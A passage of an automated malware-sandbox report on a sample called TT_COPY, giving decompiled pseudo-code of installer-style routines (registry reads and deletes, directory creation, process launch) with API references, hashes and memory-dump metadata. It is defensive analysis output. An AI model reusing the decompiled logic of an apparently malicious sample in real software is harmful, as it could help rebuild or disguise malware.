                                                                                                                            • Associated: 00000000.00000002.1069994200.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1070016354.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_TT_COPY.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 334405425-0
                                                                                                                            • Opcode ID: 8fc0b63074c346d1d24f62ec551aba281f6c9b66b265cbc2eeb406f1c7e57b21
                                                                                                                            • Instruction ID: d1cf9917c249e547a3b1759614bc69e8b445b1996c4dbd71fd6f6dd46acd7470
                                                                                                                            • Opcode Fuzzy Hash: 8fc0b63074c346d1d24f62ec551aba281f6c9b66b265cbc2eeb406f1c7e57b21
                                                                                                                            • Instruction Fuzzy Hash: 2A21C231904104FACF11AFA5CE48A9D7A71BF48358F20413BF605B91E1DBBD8A82965D
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            C-Code - Quality: 86%
                                                                                                                            			E0040259E(int* __ebx, intOrPtr __edx, short* __edi) {
                                                                                                                            				void* _t9;
                                                                                                                            				int _t10;
                                                                                                                            				long _t13;
                                                                                                                            				int* _t16;
                                                                                                                            				intOrPtr _t21;
                                                                                                                            				short* _t22;
                                                                                                                            				void* _t24;
                                                                                                                            				void* _t26;
                                                                                                                            				void* _t29;
                                                                                                                            
                                                                                                                            				_t22 = __edi;
                                                                                                                            				_t21 = __edx;
                                                                                                                            				_t16 = __ebx;
                                                                                                                            				_t9 = E00402DE6(_t29, 0x20019); // executed
                                                                                                                            				_t24 = _t9;
                                                                                                                            				_t10 = E00402D84(3);
                                                                                                                            				 *((intOrPtr*)(_t26 - 0x10)) = _t21;
                                                                                                                            				 *__edi = __ebx;
                                                                                                                            				if(_t24 == __ebx) {
                                                                                                                            					 *((intOrPtr*)(_t26 - 4)) = 1;
                                                                                                                            				} else {
                                                                                                                            					 *(_t26 + 8) = 0x3ff;
                                                                                                                            					if( *((intOrPtr*)(_t26 - 0x20)) == __ebx) {
                                                                                                                            						_t13 = RegEnumValueW(_t24, _t10, __edi, _t26 + 8, __ebx, __ebx, __ebx, __ebx); // executed
                                                                                                                            						__eflags = _t13;
                                                                                                                            						if(_t13 != 0) {
                                                                                                                            							 *((intOrPtr*)(_t26 - 4)) = 1;
                                                                                                                            						}
                                                                                                                            					} else {
                                                                                                                            						RegEnumKeyW(_t24, _t10, __edi, 0x3ff);
                                                                                                                            					}
                                                                                                                            					_t22[0x3ff] = _t16;
                                                                                                                            					_push(_t24);
                                                                                                                            					RegCloseKey();
                                                                                                                            				}
                                                                                                                            				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t26 - 4));
                                                                                                                            				return 0;
                                                                                                                            			}












                                                                                                                            0x0040259e
                                                                                                                            0x0040259e
                                                                                                                            0x0040259e
                                                                                                                            0x004025a3
                                                                                                                            0x004025aa
                                                                                                                            0x004025ac
                                                                                                                            0x004025b4
                                                                                                                            0x004025b7
                                                                                                                            0x004025ba
                                                                                                                            0x0040292e
                                                                                                                            0x004025c0
                                                                                                                            0x004025c8
                                                                                                                            0x004025cb
                                                                                                                            0x004025e4
                                                                                                                            0x004025ea
                                                                                                                            0x004025ec
                                                                                                                            0x004025ee
                                                                                                                            0x004025ee
                                                                                                                            0x004025cd
                                                                                                                            0x004025d1
                                                                                                                            0x004025d1
                                                                                                                            0x004025f5
                                                                                                                            0x004025fc
                                                                                                                            0x004025fd
                                                                                                                            0x004025fd
                                                                                                                            0x00402c2d
                                                                                                                            0x00402c39

                                                                                                                            APIs
                                                                                                                            • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 004025D1
                                                                                                                            • RegEnumValueW.KERNELBASE(00000000,00000000,?,?), ref: 004025E4
                                                                                                                            • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nshF836.tmp,00000000,00000011,00000002), ref: 004025FD
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1069590569.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1069539735.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069665567.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069705541.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069757377.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069866925.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069912074.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069940321.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069964680.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069994200.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1070016354.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_TT_COPY.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Enum$CloseValue
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 397863658-0
                                                                                                                            • Opcode ID: ae826a8f6c3ec6954e9046f9eb3adc65c04345105ad001c2eb73e3f6a73754e6
                                                                                                                            • Instruction ID: 08080f496e1fbaad801da7c4a2f11cdf7a22a5a493a276a89d416976773fa01e
                                                                                                                            • Opcode Fuzzy Hash: ae826a8f6c3ec6954e9046f9eb3adc65c04345105ad001c2eb73e3f6a73754e6
                                                                                                                            • Instruction Fuzzy Hash: 89017CB1A04105ABEB159F94DE58AAEB66CEF40348F10403AF501B61C0EBB85E44966D
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1071156042.0000000002B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_2b20000_TT_COPY.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: [_"
                                                                                                                            • API String ID: 0-331386083
                                                                                                                            • Opcode ID: 3e859c988bae7083373ba6832eea36493caf884e769953844da023ea9eaf518a
                                                                                                                            • Instruction ID: cac486cf5799fc59700f86f436ee70ad988b63b52d5789334ec34ab83f6efedb
                                                                                                                            • Opcode Fuzzy Hash: 3e859c988bae7083373ba6832eea36493caf884e769953844da023ea9eaf518a
                                                                                                                            • Instruction Fuzzy Hash: 7251FCB1A4438ADFCB34AF58C898BEA37B6FF657A4F44405AEC09AB200D7744A01CB51
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            C-Code - Quality: 86%
                                                                                                                            			E004015C1(short __ebx, void* __eflags) {
                                                                                                                            				void* _t17;
                                                                                                                            				int _t23;
                                                                                                                            				void* _t25;
                                                                                                                            				signed char _t26;
                                                                                                                            				short _t28;
                                                                                                                            				short _t31;
                                                                                                                            				short* _t34;
                                                                                                                            				void* _t36;
                                                                                                                            
                                                                                                                            				_t28 = __ebx;
                                                                                                                            				 *(_t36 + 8) = E00402DA6(0xfffffff0);
                                                                                                                            				_t17 = E00405EB7(_t16);
                                                                                                                            				_t32 = _t17;
                                                                                                                            				if(_t17 != __ebx) {
                                                                                                                            					do {
                                                                                                                            						_t34 = E00405E39(_t32, 0x5c);
                                                                                                                            						_t31 =  *_t34;
                                                                                                                            						 *_t34 = _t28;
                                                                                                                            						if(_t31 != _t28) {
                                                                                                                            							L5:
                                                                                                                            							_t25 = E00405AEB( *(_t36 + 8));
                                                                                                                            						} else {
                                                                                                                            							_t42 =  *((intOrPtr*)(_t36 - 0x28)) - _t28;
                                                                                                                            							if( *((intOrPtr*)(_t36 - 0x28)) == _t28 || E00405B08(_t42) == 0) {
                                                                                                                            								goto L5;
                                                                                                                            							} else {
                                                                                                                            								_t25 = E00405A6E( *(_t36 + 8)); // executed
                                                                                                                            							}
                                                                                                                            						}
                                                                                                                            						if(_t25 != _t28) {
                                                                                                                            							if(_t25 != 0xb7) {
                                                                                                                            								L9:
                                                                                                                            								 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
                                                                                                                            							} else {
                                                                                                                            								_t26 = GetFileAttributesW( *(_t36 + 8)); // executed
                                                                                                                            								if((_t26 & 0x00000010) == 0) {
                                                                                                                            									goto L9;
                                                                                                                            								}
                                                                                                                            							}
                                                                                                                            						}
                                                                                                                            						 *_t34 = _t31;
                                                                                                                            						_t32 = _t34 + 2;
                                                                                                                            					} while (_t31 != _t28);
                                                                                                                            				}
                                                                                                                            				if( *((intOrPtr*)(_t36 - 0x2c)) == _t28) {
                                                                                                                            					_push(0xfffffff5);
                                                                                                                            					E00401423();
                                                                                                                            				} else {
                                                                                                                            					E00401423(0xffffffe6);
                                                                                                                            					E0040653D(0x441000,  *(_t36 + 8));
                                                                                                                            					_t23 = SetCurrentDirectoryW( *(_t36 + 8)); // executed
                                                                                                                            					if(_t23 == 0) {
                                                                                                                            						 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
                                                                                                                            					}
                                                                                                                            				}
                                                                                                                            				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t36 - 4));
                                                                                                                            				return 0;
                                                                                                                            			}











                                                                                                                            0x004015c1
                                                                                                                            0x004015c9
                                                                                                                            0x004015cc
                                                                                                                            0x004015d1
                                                                                                                            0x004015d5
                                                                                                                            0x004015d7
                                                                                                                            0x004015df
                                                                                                                            0x004015e1
                                                                                                                            0x004015e4
                                                                                                                            0x004015ea
                                                                                                                            0x00401604
                                                                                                                            0x00401607
                                                                                                                            0x004015ec
                                                                                                                            0x004015ec
                                                                                                                            0x004015ef
                                                                                                                            0x00000000
                                                                                                                            0x004015fa
                                                                                                                            0x004015fd
                                                                                                                            0x004015fd
                                                                                                                            0x004015ef
                                                                                                                            0x0040160e
                                                                                                                            0x00401615
                                                                                                                            0x00401624
                                                                                                                            0x00401624
                                                                                                                            0x00401617
                                                                                                                            0x0040161a
                                                                                                                            0x00401622
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00401622
                                                                                                                            0x00401615
                                                                                                                            0x00401627
                                                                                                                            0x0040162b
                                                                                                                            0x0040162c
                                                                                                                            0x004015d7
                                                                                                                            0x00401634
                                                                                                                            0x00401663
                                                                                                                            0x004022f1
                                                                                                                            0x00401636
                                                                                                                            0x00401638
                                                                                                                            0x00401645
                                                                                                                            0x0040164d
                                                                                                                            0x00401655
                                                                                                                            0x0040165b
                                                                                                                            0x0040165b
                                                                                                                            0x00401655
                                                                                                                            0x00402c2d
                                                                                                                            0x00402c39

                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00405EB7: CharNextW.USER32(?,?,0042FA70,?,00405F2B,0042FA70,0042FA70,75DF3420,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,75DF3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405EC5
                                                                                                                              • Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405ECA
                                                                                                                              • Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405EE2
                                                                                                                            • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                                                                                              • Part of subcall function 00405A6E: CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405AB1
                                                                                                                            • SetCurrentDirectoryW.KERNELBASE(?,00441000,?,00000000,000000F0), ref: 0040164D
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1069590569.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1069539735.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069665567.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069705541.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069757377.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069866925.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069912074.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069940321.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069964680.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069994200.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1070016354.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_TT_COPY.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1892508949-0
                                                                                                                            • Opcode ID: b33db422fb51fa5ecbdb099e32eb378baf88cce1f79279cf93775203c76b05d0
                                                                                                                            • Instruction ID: 910f9ca0e916fbda017ea5bccd1daba2d9720f9cae8b5c5670dceb894c5ef12e
                                                                                                                            • Opcode Fuzzy Hash: b33db422fb51fa5ecbdb099e32eb378baf88cce1f79279cf93775203c76b05d0
                                                                                                                            • Instruction Fuzzy Hash: 3E11D031504110EBCF216FA5CD4099F36A0EF25369B28493BE945B52F1DA3E4A829A8E
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            C-Code - Quality: 84%
                                                                                                                            			E0040252A(int* __ebx, char* __edi) {
                                                                                                                            				void* _t17;
                                                                                                                            				short* _t18;
                                                                                                                            				void* _t35;
                                                                                                                            				void* _t37;
                                                                                                                            				void* _t40;
                                                                                                                            
                                                                                                                            				_t33 = __edi;
                                                                                                                            				_t27 = __ebx;
                                                                                                                            				_t17 = E00402DE6(_t40, 0x20019); // executed
                                                                                                                            				_t35 = _t17;
                                                                                                                            				_t18 = E00402DA6(0x33);
                                                                                                                            				 *__edi = __ebx;
                                                                                                                            				if(_t35 == __ebx) {
                                                                                                                            					 *(_t37 - 4) = 1;
                                                                                                                            				} else {
                                                                                                                            					 *(_t37 - 0x10) = 0x800;
                                                                                                                            					if(RegQueryValueExW(_t35, _t18, __ebx, _t37 + 8, __edi, _t37 - 0x10) != 0) {
                                                                                                                            						L7:
                                                                                                                            						 *_t33 = _t27;
                                                                                                                            						 *(_t37 - 4) = 1;
                                                                                                                            					} else {
                                                                                                                            						if( *(_t37 + 8) == 4) {
                                                                                                                            							__eflags =  *(_t37 - 0x20) - __ebx;
                                                                                                                            							 *(_t37 - 4) = 0 |  *(_t37 - 0x20) == __ebx;
                                                                                                                            							E00406484(__edi,  *__edi);
                                                                                                                            						} else {
                                                                                                                            							if( *(_t37 + 8) == 1 ||  *(_t37 + 8) == 2) {
                                                                                                                            								 *(_t37 - 4) =  *(_t37 - 0x20);
                                                                                                                            								_t33[0x7fe] = _t27;
                                                                                                                            							} else {
                                                                                                                            								goto L7;
                                                                                                                            							}
                                                                                                                            						}
                                                                                                                            					}
                                                                                                                            					_push(_t35);
                                                                                                                            					RegCloseKey();
                                                                                                                            				}
                                                                                                                            				 *0x434f88 =  *0x434f88 +  *(_t37 - 4);
                                                                                                                            				return 0;
                                                                                                                            			}








                                                                                                                            0x0040252a
                                                                                                                            0x0040252a
                                                                                                                            0x0040252f
                                                                                                                            0x00402536
                                                                                                                            0x00402538
                                                                                                                            0x0040253f
                                                                                                                            0x00402542
                                                                                                                            0x0040292e
                                                                                                                            0x00402548
                                                                                                                            0x0040254b
                                                                                                                            0x00402566
                                                                                                                            0x00402596
                                                                                                                            0x00402596
                                                                                                                            0x00402599
                                                                                                                            0x00402568
                                                                                                                            0x0040256c
                                                                                                                            0x00402585
                                                                                                                            0x0040258c
                                                                                                                            0x0040258f
                                                                                                                            0x0040256e
                                                                                                                            0x00402571
                                                                                                                            0x0040257c
                                                                                                                            0x004025f5
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00402571
                                                                                                                            0x0040256c
                                                                                                                            0x004025fc
                                                                                                                            0x004025fd
                                                                                                                            0x004025fd
                                                                                                                            0x00402c2d
                                                                                                                            0x00402c39

                                                                                                                            APIs
                                                                                                                            • RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,00000033), ref: 0040255B
                                                                                                                            • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nshF836.tmp,00000000,00000011,00000002), ref: 004025FD
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1069590569.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1069539735.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069665567.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069705541.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069757377.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069866925.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069912074.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069940321.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069964680.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069994200.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1070016354.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_TT_COPY.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseQueryValue
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3356406503-0
                                                                                                                            • Opcode ID: 396f60b8ed754a7bca231c49e3c357f93796fd3e91cbd494d3232d80d75cb633
                                                                                                                            • Instruction ID: 3e5dab0bbcc9b7b4348569693e39c51bc0b27c59e8ea0ed6abb05ebc10b9b344
                                                                                                                            • Opcode Fuzzy Hash: 396f60b8ed754a7bca231c49e3c357f93796fd3e91cbd494d3232d80d75cb633
                                                                                                                            • Instruction Fuzzy Hash: 5F116D71900219EADF14DFA4DA589AE77B4FF04345B20443BE401B62C0E7B88A45EB5D
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            C-Code - Quality: 69%
                                                                                                                            			E00401389(signed int _a4) {
                                                                                                                            				intOrPtr* _t6;
                                                                                                                            				void* _t8;
                                                                                                                            				void* _t10;
                                                                                                                            				signed int _t11;
                                                                                                                            				void* _t12;
                                                                                                                            				signed int _t16;
                                                                                                                            				signed int _t17;
                                                                                                                            				void* _t18;
                                                                                                                            
                                                                                                                            				_t17 = _a4;
                                                                                                                            				while(_t17 >= 0) {
                                                                                                                            					_t6 = _t17 * 0x1c +  *0x434f30;
                                                                                                                            					if( *_t6 == 1) {
                                                                                                                            						break;
                                                                                                                            					}
                                                                                                                            					_push(_t6); // executed
                                                                                                                            					_t8 = E00401434(); // executed
                                                                                                                            					if(_t8 == 0x7fffffff) {
                                                                                                                            						return 0x7fffffff;
                                                                                                                            					}
                                                                                                                            					_t10 = E0040136D(_t8);
                                                                                                                            					if(_t10 != 0) {
                                                                                                                            						_t11 = _t10 - 1;
                                                                                                                            						_t16 = _t17;
                                                                                                                            						_t17 = _t11;
                                                                                                                            						_t12 = _t11 - _t16;
                                                                                                                            					} else {
                                                                                                                            						_t12 = _t10 + 1;
                                                                                                                            						_t17 = _t17 + 1;
                                                                                                                            					}
                                                                                                                            					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
                                                                                                                            						 *0x433eec =  *0x433eec + _t12;
                                                                                                                            						SendMessageW( *(_t18 + 0x18), 0x402, MulDiv( *0x433eec, 0x7530,  *0x433ed4), 0);
                                                                                                                            					}
                                                                                                                            				}
                                                                                                                            				return 0;
                                                                                                                            			}











                                                                                                                            0x0040138a
                                                                                                                            0x004013fa
                                                                                                                            0x0040139b
                                                                                                                            0x004013a0
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x004013a2
                                                                                                                            0x004013a3
                                                                                                                            0x004013ad
                                                                                                                            0x00000000
                                                                                                                            0x00401404
                                                                                                                            0x004013b0
                                                                                                                            0x004013b7
                                                                                                                            0x004013bd
                                                                                                                            0x004013be
                                                                                                                            0x004013c0
                                                                                                                            0x004013c2
                                                                                                                            0x004013b9
                                                                                                                            0x004013b9
                                                                                                                            0x004013ba
                                                                                                                            0x004013ba
                                                                                                                            0x004013c9
                                                                                                                            0x004013cb
                                                                                                                            0x004013f4
                                                                                                                            0x004013f4
                                                                                                                            0x004013c9
                                                                                                                            0x00000000

                                                                                                                            APIs
                                                                                                                            • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                                            • SendMessageW.USER32(?,00000402,00000000), ref: 004013F4
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1069590569.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1069539735.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069665567.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069705541.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069757377.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069866925.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069912074.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069940321.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069964680.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069994200.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1070016354.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_TT_COPY.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MessageSend
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3850602802-0
                                                                                                                            • Opcode ID: d8feea9b0bd879c8f8267a4ec85e9a32d700cac98845316580bbb569ce856791
                                                                                                                            • Instruction ID: f98c5e72cab4da6dd47fcf147c12dc0649e5852bd482257a86ca63d172a8b8d6
                                                                                                                            • Opcode Fuzzy Hash: d8feea9b0bd879c8f8267a4ec85e9a32d700cac98845316580bbb569ce856791
                                                                                                                            • Instruction Fuzzy Hash: 0B01F4316202209FE7094B389D05B6A3698E710319F14823FF851F65F1EA78DC029B4C
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            C-Code - Quality: 100%
                                                                                                                            			E00402434(void* __ebx) {
                                                                                                                            				long _t7;
                                                                                                                            				void* _t14;
                                                                                                                            				long _t18;
                                                                                                                            				intOrPtr _t20;
                                                                                                                            				void* _t22;
                                                                                                                            				void* _t23;
                                                                                                                            
                                                                                                                            				_t14 = __ebx;
                                                                                                                            				_t26 =  *(_t23 - 0x20) - __ebx;
                                                                                                                            				_t20 =  *((intOrPtr*)(_t23 - 0x2c));
                                                                                                                            				if( *(_t23 - 0x20) != __ebx) {
                                                                                                                            					_t7 = E00402E64(_t20, E00402DA6(0x22),  *(_t23 - 0x20) >> 1); // executed
                                                                                                                            					_t18 = _t7;
                                                                                                                            					goto L4;
                                                                                                                            				} else {
                                                                                                                            					_t22 = E00402DE6(_t26, 2);
                                                                                                                            					if(_t22 == __ebx) {
                                                                                                                            						L6:
                                                                                                                            						 *((intOrPtr*)(_t23 - 4)) = 1;
                                                                                                                            					} else {
                                                                                                                            						_t18 = RegDeleteValueW(_t22, E00402DA6(0x33));
                                                                                                                            						RegCloseKey(_t22);
                                                                                                                            						L4:
                                                                                                                            						if(_t18 != _t14) {
                                                                                                                            							goto L6;
                                                                                                                            						}
                                                                                                                            					}
                                                                                                                            				}
                                                                                                                            				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t23 - 4));
                                                                                                                            				return 0;
                                                                                                                            			}









                                                                                                                            0x00402434
                                                                                                                            0x00402434
                                                                                                                            0x00402437
                                                                                                                            0x0040243a
                                                                                                                            0x00402476
                                                                                                                            0x0040247b
                                                                                                                            0x00000000
                                                                                                                            0x0040243c
                                                                                                                            0x00402443
                                                                                                                            0x00402447
                                                                                                                            0x0040292e
                                                                                                                            0x0040292e
                                                                                                                            0x0040244d
                                                                                                                            0x0040245d
                                                                                                                            0x0040245f
                                                                                                                            0x0040247d
                                                                                                                            0x0040247f
                                                                                                                            0x00000000
                                                                                                                            0x00402485
                                                                                                                            0x0040247f
                                                                                                                            0x00402447
                                                                                                                            0x00402c2d
                                                                                                                            0x00402c39

                                                                                                                            APIs
                                                                                                                            • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 00402456
                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 0040245F
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1069590569.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1069539735.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069665567.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069705541.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069757377.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069866925.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069912074.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069940321.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069964680.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069994200.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1070016354.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_TT_COPY.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseDeleteValue
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2831762973-0
                                                                                                                            • Opcode ID: c3c6b7550dbde9c734417ebb6026166a008a1ebd8ce44d6e45d86d0a97bc7a60
                                                                                                                            • Instruction ID: 30df5d2aec36195d54007c6df5f336708121daf1b93815cec1e8c6dbc8099d71
                                                                                                                            • Opcode Fuzzy Hash: c3c6b7550dbde9c734417ebb6026166a008a1ebd8ce44d6e45d86d0a97bc7a60
                                                                                                                            • Instruction Fuzzy Hash: 22F0C232A00120EBDB11ABB89B4DAED72A8AF84314F15443BE141B71C0DAFC5D01866D
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            C-Code - Quality: 100%
                                                                                                                            			E00405B20(WCHAR* _a4) {
                                                                                                                            				struct _PROCESS_INFORMATION _v20;
                                                                                                                            				int _t7;
                                                                                                                            
                                                                                                                            				0x430270->cb = 0x44;
                                                                                                                            				_t7 = CreateProcessW(0, _a4, 0, 0, 0, 0x4000000, 0, 0, 0x430270,  &_v20); // executed
                                                                                                                            				if(_t7 != 0) {
                                                                                                                            					CloseHandle(_v20.hThread);
                                                                                                                            					return _v20.hProcess;
                                                                                                                            				}
                                                                                                                            				return _t7;
                                                                                                                            			}





                                                                                                                            0x00405b29
                                                                                                                            0x00405b49
                                                                                                                            0x00405b51
